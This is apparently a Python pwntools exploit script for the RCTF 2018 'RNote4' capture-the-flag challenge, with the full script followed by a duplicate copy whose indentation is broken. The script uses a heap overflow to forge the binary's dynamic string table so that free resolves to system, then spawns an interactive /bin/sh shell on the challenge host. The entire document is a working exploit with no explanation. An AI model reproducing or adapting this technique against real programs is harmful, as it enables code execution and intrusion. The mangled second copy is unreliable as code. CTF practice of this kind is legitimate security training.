hama7230/exploit.py

## exploit.py
#!/usr/bin/env python
# RCTF 2018 RNote4
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('')
elf = ELF('./RNote4')
context(os='linux', arch=elf.arch)
context(log_level='debug')  # output verbose log

RHOST = "rnote4.2018.teamrois.cn"
RPORT = 6767
LHOST = "127.0.0.1"
LPORT = 6767

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """
    b *0x400A88
    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./RNote4'], gdbscript=gdbscript)
else:
    conn = process(['./RNote4'])
    # conn = process(['./RNote4'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

def alloc(size, payload):
    conn.send('\x01')
    conn.send(chr(size))
    conn.send(payload)

def edit(idx, size, payload):
    conn.send('\x02')
    conn.send(chr(idx))
    conn.send(chr(size))
    conn.send(payload)

def delete(idx):
    conn.send('\x03')
    conn.send(chr(idx))

# exploit
base = 0x602180
dyn = 0x601eb0

log.info('Pwning')
alloc(0x18, 'x'*0x18)
alloc(0x18, 'y'*0x18)

# set fake strtab on bss
edit(0, 0x30, 'z'*0x28+p64(base))
payload = '\x00'
payload += "libc.so.6\x00" + 'exit\x00'+'__stack_chk_fail\x00'+'stdin\x00'+'calloc\x00'+'memset\x00'+'read\x00'+'alarm\x00'+'atoi\x00'+'setvbuf\x00'+'__libc_start_main\x00'+'system\x00'
payload += 'system\x00' * 10
payload += '/bin/sh\x00'
edit(1, 0xf0, payload.ljust(0xf0, 'a'))
# overwrite strtab pointer in .dynamic to fake strtab
edit(0, 0x30, 'z'*0x28+p64(dyn))
edit(1, 0x8, p64(base))
# to free('/bin/sh')
edit(0, 0x30, 'z'*0x18+p64(0x21)+p64(0xdeadbeef)+p64(0x60222c))

# triger
delete(1)
conn.interactive()
	#!/usr/bin/env python
	# RCTF 2018 RNote4
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('')
	elf = ELF('./RNote4')
	context(os='linux', arch=elf.arch)
	context(log_level='debug') # output verbose log

	RHOST = "rnote4.2018.teamrois.cn"
	RPORT = 6767
	LHOST = "127.0.0.1"
	LPORT = 6767

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """
	b *0x400A88
	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./RNote4'], gdbscript=gdbscript)
	else:
	conn = process(['./RNote4'])
	# conn = process(['./RNote4'], env={'LD_PRELOAD': ''})
	if opt == 'a': gdb.attach(conn)

	def alloc(size, payload):
	conn.send('\x01')
	conn.send(chr(size))
	conn.send(payload)

	def edit(idx, size, payload):
	conn.send('\x02')
	conn.send(chr(idx))
	conn.send(chr(size))
	conn.send(payload)

	def delete(idx):
	conn.send('\x03')
	conn.send(chr(idx))

	# exploit
	base = 0x602180
	dyn = 0x601eb0

	log.info('Pwning')
	alloc(0x18, 'x'*0x18)
	alloc(0x18, 'y'*0x18)

	# set fake strtab on bss
	edit(0, 0x30, 'z'*0x28+p64(base))
	payload = '\x00'
	payload += "libc.so.6\x00" + 'exit\x00'+'__stack_chk_fail\x00'+'stdin\x00'+'calloc\x00'+'memset\x00'+'read\x00'+'alarm\x00'+'atoi\x00'+'setvbuf\x00'+'__libc_start_main\x00'+'system\x00'
	payload += 'system\x00' * 10
	payload += '/bin/sh\x00'
	edit(1, 0xf0, payload.ljust(0xf0, 'a'))
	# overwrite strtab pointer in .dynamic to fake strtab
	edit(0, 0x30, 'z'*0x28+p64(dyn))
	edit(1, 0x8, p64(base))
	# to free('/bin/sh')
	edit(0, 0x30, 'z'*0x18+p64(0x21)+p64(0xdeadbeef)+p64(0x60222c))

	# triger
	delete(1)
	conn.interactive()